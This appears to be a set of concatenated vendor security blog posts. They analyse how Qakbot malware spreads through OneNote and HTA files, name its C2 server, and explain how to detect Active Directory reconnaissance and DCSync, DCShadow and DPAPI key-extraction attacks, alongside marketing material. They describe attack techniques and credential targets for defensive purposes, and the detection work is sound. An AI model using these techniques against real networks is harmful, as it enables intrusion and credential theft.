Qakbot (aka Qbot or Pinkslipbot) is a banking trojan first discovered in 2008. It is a self-propagating virus designed to steal sensitive data on target networks. Qakbot also provides remote code execution (RCE) capabilities, allowing attackers to manually achieve secondary objectives, such as scanning the compromised network or injecting ransomware. Qakbot’s modules allow automated targeting of financial data, locally stored emails, system passwords or password hashes, website passwords, and cookies from web browser caches. Attackers can also use Qakbot to steal credentials by logging keystrokes. 

This blog post analyzes two new distribution vectors Qakbot uses for initial infection of targeted systems. From 2020 through 2022, Qakbot has leveraged a variety of infection vectors that originate in malware phishing campaigns (Figure 1). However, in recent months, Qakbot has successfully infected networks via Microsoft OneNote files (.one file extension) and HTML application files (.hta file extension).  

Figure 1: Qakbot Distribution Vectors

Qakbot Detection Challenges

 Qakbot routinely defies antivirus (AV) systems, making its presence difficult to spot. The malware persists in a local system environment and will not decrypt its payload or execute in some scenarios, such as when it detects virtualization, certain security products, or specific Windows Registry keys. This allows Qakbot to conceal itself and prevents security researchers from discovering and analyzing the payload. Another Qakbot stealth strategy is injecting itself (or piggybacking) into legitimate application processes.  

One potential indictor of a Qakbot compromise is an unauthorized run key in the Windows Registry. Registry run keys facilitate automatic program execution upon user log-in or system start-up. Qakbot leverages that functionality to auto-start itself, which facilitates persistence on a system. However, Qakbot routinely receives updates in response to published security research so that it can mask its known indicators of compromise (IOCs) and make it difficult for security teams to hunt for this threat with confidence.  

Latest Distribution Techniques

The most effective way to track Qakbot is to keep up with the latest attack vectors. This section outlines two new distribution techniques seen in the wild as of March, 2023. 

Technique 1: Distribution Via a OneNote File

A .one file is a notebook created by the Microsoft OneNote office productivity application. These files contain one or more sections, each containing pages of notes. OneNote files may contain text, digitized handwriting, and objects pasted from other applications, such as images, drawings, and audio or video clips. 

Qakbot campaigns using the OneNote attack vector originate as phishing emails. In this technique, the malware masquerades as a .one file attachment. User interaction with the attachment begins the infection process. The malware drops its executable payload (a randomly named .dat file) at a targeted path through execution of Windows command line and PowerShell scripts. The Qakbot PowerShell also disables Windows Defender’s real-time detection capabilities. Upon successful launch of the payload file, the Qakbot infection communicates back to its command and control (C2) server to exchange stolen data and establish further infection capabilities. 

Figure 2: PowerShell Dropper Component 

Figure 3: Qakbot Infection Chain Via OneNote Files 

Technique 2: Distribution Via an HTML Application File 

The .hta file extension is a file format used in HTML applications. HTML applications can contain hypertext code, Visual Basic scripts, or JavaScript code, depending on the program setup. Since .hta files are treated as stand-alone programs, they can execute outside of the confines of a browser’s security context. Because of this, they are treated as trusted applications. The text format of .hta makes them editable by any program that can edit plain text. The default file-association for the .hta extension is the Microsoft HTML Application Host (mshta.exe). These files store executable code that can be run from an HTML document.  

As with the majority of malware, Qakbot’s initial infection vector relies upon spam emails and unsuspecting user interaction. Once the user opens the .hta file attachment, the embedded, malicious JavaScript serves as a loader to drop an executable payload (again, a randomly named .dat file) to its targeted file path. Upon launching the payload file, the Qakbot infection communicates with its C2 server. 

Figure 4: Qakbot Infection Chain Via HTML Application Files

Follow-on Actions 

Once the malicious .dat file is executed it communicates back to the command-and-control server located at (in this case) 139.99.117.17. As shown in Figure 5, this is a well-known malicious host. 

Figure 5: Command and Control Server

Once the system is infected, Qakbot will: 

• Collect information about the compromised host 
• Create scheduled tasks to escalate privileges and establish persistence 
• Harvest credentials 
• Dump credentials (.exe access)  
• Steal passwords from browser history and cookies 
• Target web banking links with web injects 
• Perform brute-force password guessing 
• Manipulate Windows Registries to maintain persistence 
• Self-replicate 
• Perform process injection to conceal its operations 

MITRE ATT&CK Tactics & Techniques: 

Fidelis Elevate detects Qakbot Banking Trojan automatically as part of the curated and in-house intelligence feeds that provide insight into the most pressing threats. Additionally, Fidelis Network’s active threat detection can help narrow the search by providing insight into the exact MITRE ATT&CK TTPs that are present in customer environments. 

Stay Up to Date with the Monthly Threat intelligence Summary 

Every month, the Fidelis Cybersecurity Threat Research Team analyzes the latest cyber security news, threats, vulnerabilities, and exploits. These findings are published in the Threat Intelligence Summary, along with useful links and analysis so that you can stay ahead of threats. Be sure to read the latest report. Also, subscribe to the Threat Geek blog for timely information that matters most to cyber security professions. 

We are thrilled and honored to be recognized with the Gold Medal for Security from Merit Awards! This award underscores our strong dedication to cybersecurity excellence as we work tirelessly to protect the world’s most sensitive data and IT assets. Through our leading-edge technology, we offer deeper visibility, faster threat detection and response, and continuous risk assessment, all while ensuring unified cloud security and compliance.

Marie Zander, Executive Director of the Merit Awards, said, “There was an overwhelming volume of Merit Awards Telecom submissions this year which clearly is a reflection of the innovations and technology advancements the industry has made over the last year.”

We’ve engineered Fidelis Elevate and Fidelis CloudPassage Halo platforms to empower organizations with the ability to build a proactive cyber defense strategy by detecting and mitigating threats before they can compromise critical assets.

Thank you to Merit Awards for this recognition, we look forward to continuing to invest in research and development to deliver the best possible proactive cybersecurity solutions on this journey toward a more secure digital future.

Read the press release to learn more

Active Directory (AD) attack can happen fast. You must be faster. Once the attacker assumes an AD user account, your chances of finding them dwindles. They can gain widespread access – even that of an administrator. They can move through systems undetected and execute code as if they were the assumed user. By the time you realize something is wrong, it is often too late; the damage is done. The attacker has exfiltrated data, infected systems, or detonated ransomware. You’re left to clean up the mess.

In this blog, we will show how, through network monitoring, you can catch attackers who target Active Directory environments. The best detection techniques catch attackers in the earliest stage possible while reducing false positives. For that reason, we will focus here on catching attackers during the Reconnaissance stage, which is an early part of any attack.

LDAP Reconnaissance

By default, any normal AD user in a domain has LDAP read permissions for that domain.
Thus, an attacker who compromises a domain user (a user who is not a member of a high privileged group such as domain admins) will be able to perform domain reconnaissance for mapping the domain objects. Reconnaissance is a key part of any AD attack, as it allows the attacker to map the victim’s environment. They can then use that intelligence for lateral movement and privilege escalation. We will focus on the following LDAP attributes to catch attacker in the reconnaissance stage:

UserAccountControl

The UserAccountControl attribute within AD specifies the configuration of specific account settings. For example: UserAccountControl can indicate disabled accounts or accounts that do not require Kerberos pre-authentication when logging in.

The following list contains all the possible options for UserAccountControl:

Image Source: Microsoft

We will focus on LDAP queries where attackers look for the following UserAccountControl flags:
PASSWD_NOTREQD, DONT_REQ_PREAUTH, TRUSTED_FOR_DELEGATION, ENCRYPTED_TEXT_PWD_ALLOWED.

PASSWD_NOTREQD

When an AD user account has the PASSWD_NOTREQD flag, the account can have an empty password. Attackers will look for those accounts to try without a password. The attacker’s goals are to move laterally on the domain and compromise domain accounts. The faster they can achieve that objective, the less likely it is that they’ll be detected at this early stage of attack. Logging into these types of AD accounts accelerates the time to infiltration by eliminating the need to discover an account password.

We will flag the following LDAP query as suspicious:

DONT_REQ_PREAUTH

When an AD user account has DONT_REQ_PREAUTH flag, the attacker can ask for an encrypted Ticket Granting Ticket (TGT) for the user without providing a password. The TGT is signed with the target user password, allowing the attacker to try brute forcing the password offline. This type of attack is known as ‘As-Rep Roasting’ (MITRE T1558.004).

We will flag the following LDAP query as suspicious:

TRUSTED_FOR_DELEGATION

When an AD computer account has the TRUSTED_FOR_DELEGATION flag set, the computer will save the Ticket Granting Ticket(. An attacker who manages to compromise the computer account will be able to dump KERBEROS TGT tickets for all logged-on users. The attack is known as . In addition, attackers can use various techniques to force authentication to the victim computer account, for dumping the KERBEROS TGT tickets later.

We will flag the following LDAP query as suspicious:

ENCRYPTED_TEXT_PWD_ALLOWED

When an AD user account has the ENCRYPTED_TEXT_PWD_ALLOWED flag set, an attacker who compromises the AD database gains read access to the user account password in a clear text. Typically, these passwords would appear in an NTLM hash format. The clear-text access accelerates an attack by eliminating the need to brute force the password.

We will flag the following LDAP query as suspicious:

Service Principal Name
Service Account

A service account is an AD user account created to run a specific service or application.
For example, if a SQL service needs access to resources over the domain, a service account with the right access to the resources can be created and used by the service.

AD uses the service principal name (SPN) attribute to differentiate between different services.
Every service account will have an SPN defined representing the specific service it was created for.

KERBEROS Service Tickets

Upon Kerberos authentication, any logged-in user can request the Kerberos domain controller (KDC) for access to any service on the domain. The service is identified by SPN.
When an account asks for access to a service on the domain, the KDC returns a service ticket to the client. The service ticket is encrypted with the password hash of the requested domain object hosting the service. For example, when connecting using SSH to a domain computer, the service ticket is encrypted with the domain computer hash hosting the SSH service. An attacker who receives the service ticket can attempt to brute force the hashed password offline.

The password of a machine account is set randomly with a length of 120 characters, whereas passwords of user accounts are usually shorter and often follow predictable patterns. This makes a brute force attempt on a user password faster and easier than trying to crack a machine account password.

KERBEROASTING ATTACK

The fact that service account has SPN configured, and the fact that any logged-on user can ask for a service ticket in the domain, allowing an attacker who compromise a low privileged domain user to search for service users, ask for a service ticket for them and brute force their password offline. The attack is known as ‘KERBEROASTING’ (MITRE T1558.003)

An example for a suspicious LDAP query:

Clear Text Passwords

The following LDAP attributes may contain passwords in clear text:

UnixUserPassword

UnixUserPassword is an LDAP attribute for UNIX based systems. Attacker can enumerate the domain for users with  UnixUserPassword configured, as it might be saved in a clear text format.

An example for suspicious LDAP query:

Description
Poorly configured Active Directory environment may contain password in the description:

We will flag LDAP queries who look for password in description, for example:

NT-Security-Descriptor

Active Directory uses access control list (ACL) for accounts authorizations.

Knowing the ACLs of accounts in AD will allow attackers to plan their attack for lateral movement and privilege escalation on the domain. , an open-source tool, is using ACL analysis for mapping the possible attacks on a given domain:

AD saves the ACL of an object in ’nTSecurityDescriptor’ LDAP attribute.

The ’nTSecurityDescriptor’ is divided to 4 parts:

• Owner – The owner of the object
• Group SID (Security identifier) – The group associated with the object
• DACL- Allow/Deny list for the object:

• SACL- Auditing permissions for the object:

• • An attacker who compromises a low privileged AD user will not have permission to the SACL part of the security descriptor. The DACL is the most important part of the descriptor, from the attacker perspective, as it identifies authorized actions the object can perform within the domain. To get the DACL part on the security descriptor using LDAP, the attacker must specify what part of the descriptor they are interested in. LDAP uses a control named ’LDAP_SERVER_SD_FLAGS_OID’ that controls which part of the descriptor can be retrieved.

The following flags describe the different possible descriptors:

Image:https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/3888c2b7-35b9-45b7-afeb-b772aa932dd0

To catch attacker who performs ACL analysis using LDAP, we will monitor requests for the nTSecurityDescriptor object with one of LDAP_SERVER_SD_FLAGS_OID. For example, we can identify an attacker who asks for the DACL only:

Conclusion

Threat actors continually innovate, creating new and novel techniques to gain access to confidential information. Reconnaissance is a key part of any AD attack. Without mapping AD objects and their connections, the attackers will find it difficult to compromise the domain. Applying detection rules helps catch the attackers early on before any damage is done. To keep your organization safe, ensure your systems are up to date, and that you have installed an automated detection system, such as Fidelis Elevate, to proactively defend against cyber-threats and active attacks.

Subscribe to the Threat Geek blog for the latest updates, threat research, and industry insights from the professionals at Fidelis Cybersecurity. To see first-hand how the Fidelis Cybersecurity platforms help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries across network, endpoints, and cloud, schedule a free demo.

Is your organization’s security strategy prepared to face modern cyber threats? Cyber threats are evolving at an unprecedented pace, demanding organizations to align their security strategies accordingly. Traditional security methods prove ineffective against advanced threats and sophisticated attacks. Despite implementing new security measures, cybercriminals consistently outpace defenses, leveraging advanced technologies like AI/ML, deepfakes, and as-a-service malware and ransomware delivery. Make cyber resiliency your organization’s top priority and actively safeguard your network from potential threats.

According to the National Institute of Standards and Technology (NIST),  cyber resilience is: “the ability to anticipate, withstand, recover from, and adapt to adverse conditions, stresses, attacks, or compromises on systems that use or are enabled by cyber resources.” The key here is to anticipate and be proactive in protecting data and IT assets, regardless of what happens, so that network operations continue as normal.

Proactive Cyber Defense is Gaining Traction

At Fidelis Cybersecurity, we recently surveyed over 11,000 of our LinkedIn followers and found that an increasing number of organizations are adopting a proactive approach to cybersecurity. And it’s a good thing! Proactive cyber defense means that you’re focused on getting ahead of attacks and reclaiming the advantage over adversaries. Those proactive measures are a natural step toward building a more resilient network.

Figure 1: Survey results – How organizations approach cybersecurity in 2023.

Cyber Resiliency is All the Rage

In 2020, the world underwent an overwhelming period of rapid digital transformation. By the end of that year, IDG revealed that 78% of cybersecurity leadership lacked confidence in their organization’s security posture. Shortly thereafter, IDC predicted a surge in cyber resiliency spending. Ever since, consumer and government groups have committed to collective actions on cyber resiliency, including:

• Global oil companies at The World Economic Forum, May 2022
• CISA, in their Strategic Plan for 2023-2025
• The United States White House’s national security strategy, March 2023

And those are just a few examples that the world is moving away from talking solely about security, turning instead toward building resiliency.

Cybersecurity vs. Cyber Resiliency: What’s the Difference?

If you’re like us, you’ve spent your entire career focusing on keeping your organization safe from cyber threats. But recent high-profile attacks, demonstrate that our focus on “security” isn’t working. One could assume that, had these organizations placed more emphasis on resiliency, they might have been better prepared to withstand and recover from these adversities.

Let’s explore the reason behind this.

Security is binary in nature. Something is secure, or it’s not. It focuses on keeping bad actors out and responding if-and-when a breach takes place. However, as we all know, attackers find their way inside regardless. Or they originate as inside threats–even if they’re just innocent users accidentally clicking an infected link.

Resilience takes on the “what-if” questions and picks up where security leaves off. It adapts to the chaos of our rapidly changing cyber landscape and acknowledges that a successful cyber-attack or accidental breaches a matter of “when”, not “if”. It solidifies the tools and processes required for rapid post-breach detection and response, surpassing traditional defensive security solutions.

Figure 2: security vs. resilience.

Organizations must continuously assess and update their security measures, identify potential vulnerabilities, and train their employees to recognize and respond to cyber threats. The failure to prioritize to do so can result in significant financial losses, reputational damage, and legal liabilities as demonstrated above.

Hope for the Best; Plan for the Worst

About now, you might be thinking that the days of cybersecurity are over. It’s true that, to outmaneuver threat actors and promote business continuity, organizations must prioritize resiliency but not at the cost of security.

Security-focused strategies hope for the best. They aim to keep adversaries out by building strong defenses and keeping track of all the data, assets, users, connections, and potential risks inside. Resiliency plans for the worst. A resiliency strategy assumes that the threat actor is already inside and aims to shorten the attack lifecycle while placing a strong emphasis on continuity.

A highly automated, proactive cyber defense is the sweet spot between security and resiliency. It hopes for the best and plans for the worst at the same time.

Figure 3: How security strategies can embrace resiliency

Adversaries focus on exploiting the weakest link in the system, penetrating deeper, staying longer, and causing lasting damage once they bypass defenses. Balancing resiliency with security provides two critical benefits:

1. You’ll catch the adversary as early in their attack lifecycle as possible—before the damage is done, and
2. You’ll provide critical intelligence into attacker movements so that security becomes a process of continuous improvement.

With the right balance in place, organizations can effectively mitigate risk, respond quickly to post-breach attacks, and distract adversaries to protect critical data and systems, all while keeping assets available through and beyond a breach.

Navigating Cyber Resiliency Together

At Fidelis Cybersecurity, we are proud to say that we are ahead of the cyber resiliency trend. Our technology is designed for proactive cyber defense, providing customers with deep insights into threat actors’ movement within their network. Our platforms couple intelligent deception with active threat detection to distract post-breach attackers, shorten the attack lifecycle, and keep data and assets safe before, throughout, and beyond an attack. With strong resiliency-based solutions, we help customers protect, detect, respond, and neutralize threats faster so that they can minimize the impact of any breaches and keep networks running strong.

Read more about cyber resiliency in our whitepaper or watch our on-demand webinar on the topic.

When threats emerge, the Fidelis Cybersecurity Threat Research team (TRT) is ready. Each month, the Threat Intelligence Summary examines the latest threats and trends so you can stay resilient against cyber adversaries.

In April 2023, we saw a continued rise in Russian state-sponsored threat actors, the shutdown of a widely used hacker marketplace, “shadow ban” attacks against Twitter users, and the emergence of several new high and critical vulnerabilities, including a zero-day exploit against Google Chrome. We also provide updates to the metrics and information on the most impactful vulnerabilities and malware strains in the wild today and included information on some of the top phishing sites observed over the month.

Read the April 2023 Threat Intelligence Summary

Top Emerging Vulnerabilities

The Fidelis Cybersecurity TRT’s top-ten vulnerability list for March includes critical and high severity CVEs that, when exploited, lead to privilege escalation, distributed denial of service attacks (DDoS), arbitrary code execution, and more.

We also include the base scores for each of our top vulnerabilities. The base score is a complex calculation that weighs several factors, including exploitability (attack complexity, scope, privileges required, etc.), impact metrics, CVE maturity, and more. The value, from 0 to 10, represents the potential severity of the threat. The higher the number, the more critical the CVE.

These base scores serve as one reliable indicator of threat criticality. However, there are many factors that go into our top ten inclusion. The list presented in our report represents what we have observed as the month’s most credible threats to any organization using unpatched systems or software. Whether a vulnerability is newly discovered, has proofs of concept available, or is being actively exploited, regular patch management is imperative for securing your organization.

See the full list >

Malware Attacks by Industry

Fidelis Cybersecurity tracks the most prevalent malware threats to keep our detection feeds up to date and our clients secure. In April 2023, Fidelis detected and defended against more than two hundred and two thousand high-severity malware threats. For the April report, we continue with the addition of metrics to examine submissions to the Fidelis Sandbox malware analysis service. Read the report to see how we curate and evaluate sandbox samples. You’ll also get a deep dive into some of the hardest hit industries over the past month, and details regarding the most prevalent malware threats indicated by open-source reporting.

See the full analysis >

Top Phishing Domains

Each month, our report contains the top five active phishing sites observed in the wild. While the best defense against phishing is user vigilance, security teams can rely on emerging data like this to help bolster defenses.

See the top phishing domains list >

About the Fidelis Cybersecurity Threat Research Team

The Threat Research team at Fidelis Cybersecurity researches and analyzes the latest threats and issues. The intelligence we gather from multiple open-source and proprietary sources about our cyber adversaries’ tactics, techniques, and procedures (TTPs) is fed directly into our platforms, products, and services to help our customers detect, neutralize, and eliminate threats before they can harm production systems.

Visit the Fidelis Cybersecurity Threat Research page to read the complete April 2023 Threat Intelligence Summary, along with information on critical threats and resources to help you better prepare for the next attack.

In the previous blog, we described how to catch attackers targeting Active Directory (AD) in the reconnaissance stage, which is one of the earliest stages of the attack. We mainly focused on LDAP protocol, flagging suspicious queries.

In part two, we describe how to detect more advanced AD attacks that are based on DCE/RPC protocol.

In an AD environment, DCE/RPC protocol-based attacks can have severe consequences. They can compromise domain controllers, escalate privileges, or facilitate lateral movement within the network. AD leverages the RPC mechanism for various operations, making it an attractive target for adversaries. We will focus on the following attacks: DCSync, DCShadow and Extraction of domain DPAPI backup key from Domain Controllers. We will use Network Traffic Analysis (NTA) to detect the attacks.

DCSync

Mitre: T1003.006
Attack name: DCSync
Common attacking tools: Mimikatz, Impacket

An attacker who compromised AD user account can pretend to be a Domain Controller (DC) and ask for sensitive information, provided the compromised account has the following permissions: Replicating Directory Changes, Replicating Directory Changes All. The attacker will leverage the Directory Replication Service Remote Protocol, which is used for replication between domain controllers. In particular, they will use the DSGetNCChanges function, which retrieves data updates from the DC.

While the attacker typically uses Mimikatz in these attacks, they can use other tools as well. Regardless, the tool will ask the DC for user and computer NTLM hashes stored at the AD database file (NTDS.DIT). After the attacker gets the hashes, they can try to brute force attack offline and determine passwords. Or, if using krbtgt service account hash, the attacker can perform a golden ticket attack.

Figure: Attacker using Mimikatz with DC SYNC to discover NTLM hash of The Administrator

Detection

When using DCE/RPC protocol, the client specifies which RPC interface they want to connect to. After the connection is done, the client specifies which RPC procedures they want to use. When using DCSync attack, the attacker will send a bind request for DRSUAPI interface, and after the binding process is complete, they will send DSGetNCChanges request to the server, which is a request for AD objects updates. Detecting those packets from a non-DC to a DC will help us catch the DCSync attack in real time.

To detect a DCSync attack, we will analyze traffic between non-DC and a DC. We will capture the following packets for the detection:

1. DCE/RPC bind request for DRSUAPI interface:

2.DRSUAPI packet with DsGetNCChanges request:

DC SHADOW

Mitre: T1207
Attack name: DCShadow
Common Attacking tools: Mimikatz

In DCShadow attack, the attacker registers a machine as a DC, allowing the attacker to push changes to AD environment through replication between his rogue DC to the other DCs. The attacker will need to compromise a Domain Admin or Enterprise Admin account to perform the attack.

After registering the rogue DC, an attacker can change any AD object attributes in the domain.
The attack has a lot of similarities to DCSync attack. However, while DcSync gives the attacker the ability to read information from the DC, DCShadow allows the attacker to write and update the DC.

Figure: DCShadow attack using Mimikatz

Detection

Like DCSync, In DCShadow attack, DRSUAPI interface is used. DCShadow using the following RPC procedures as part of his attack:- DrsAddEntry: the attacker alters the spn of his rouge DC to “GC/*” in the domain Configuration partition.

– DrsReplicaAdd: the attacker pushes the malicious Active Directory objects he changed to the DC.

To detect DCSync, we will catch a bind request for DRSUAPI interface, and RPC procedure requests for  DrsAddEntry and DrsReplicaAdd. If the request originates from a non-dc to a dc we will alert.

To detect DCSync attack, we will analyze traffic between non-DC to A DC. We will capture the following packets for the detection:

1. DCE/RPC bind request for DRSUAPI interface:

2. DRSUAPI packet with DrsAddEntry request:

3. DRSUAPI packet with DrsReplicaAdd request:

Reading Domain DPAPI BACKUP KEY FROM DOMAIN CONTROLLER

Mitre: T1555.003
Attack name: Domain DPAPI backup key extraction
Common Attacking tools: Mimikatz, SharpDPAPI, Impacket

Windows provides a mechanism for protecting asymmetric private keys, passwords, and confidential data. The mechanism, called DPAPI, performs symmetric encryption of data. DPAPI allows developers to encrypt data without the need for implementing the underlying encryption algorithm. Every windows user will have a DPAPI master key he can use to encrypt and decrypt data.

Common uses of DPAPI encryption include:

• Network passwords in Credential Manager
• Google Chrome cookies and login data
• Users pin and fingerprint in Windows 8
• WIFI passwords
• VPN passwords
• Email Account passwords

In an AD environment, the DPAPI master key is encrypted with the user domain password. Decryption of the DPAPI master key will allow attackers to read all the data protected by DPAPI. The domain controllers have a backup mechanism to recover domain users master keys (for the case of lost passwords). For every domain, the domain controllers have one pair of public and private keys associated with DPAPI. The clients in the domain use the domain DPAPI backup public key to encrypt their master key. If an attacker gains access to the domain DPAPI backup private key, he can decrypt any domain user’s DPAPI master key, allowing him to reveal all the confidential data encrypted with the DPAPI master key. The attacker will require admin privileges to extract the domain backup key from domain controllers.

Detection

Attackers will use the LsaRetrievePrivateData function of the LSARPC interface in order to request the domain backup key from the DC. To detect the attacks, we will capture a DCE/RPC bind request for LSARPC interface, and a request for LsaRetrievePrivateData function from the DC.

To detect domain DPAPI backup key extraction attack, we will analyze all the traffic going into the DC.
We will look for attempts to get the domain DPAPI backup key from the DC.
We will capture the following packets for the detection:

1. DCE/RPC bind request for LSARPC interface:

2. LSARPC packet with LsaRetrievePrivateData API request:

Conclusion

Threat actors continually innovate, creating new and novel techniques to gain access to confidential information. Utilizing AD attacks will allow adversaries to elevate privileges and move laterally on a compromised network, which may lead to a domain compromise.  Applying detection rules helps catch the attackers early on before any damage is done. To keep your organization safe, ensure your systems are up to date, and that you have installed an automated detection system, such as Fidelis Elevate, to proactively defend against cyber-threats and active attacks.

Subscribe to the Threat Geek blog for the latest updates, threat research, and industry insights from the professionals at Fidelis Cybersecurity. To see first-hand how the Fidelis Cybersecurity platforms help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries across network, endpoints, and cloud, schedule a free demo.